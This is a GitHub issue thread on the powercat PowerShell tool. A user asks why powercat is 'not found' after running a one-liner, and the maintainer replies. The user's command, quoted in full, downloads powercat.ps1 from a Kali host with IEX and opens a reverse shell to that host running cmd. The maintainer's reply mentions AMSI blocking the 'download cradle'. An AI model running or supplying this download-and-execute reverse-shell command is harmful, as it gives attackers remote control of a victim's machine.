besimorhino / powercat

netshell features all in version 2 powershell
Apache License 2.0
2.15k stars 473 forks source link

Power Cat command not found on CMD Windows #22

Closed Vedant-Bhalgama closed 4 years ago

Vedant-Bhalgama commented 4 years ago

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/powercat.ps1');powercat -c 10.0.2.4 -p 1234 -e cmd"

I am using this command for downloading powercat from my kali server and then opening a shell connection, But it says this error

Capture

besimorhino commented 4 years ago

Can you please give more info on what you are doing on your kali box to serve up powercat?

Also, are you sure AMSI is not stopping your download cradle?

Please let us know.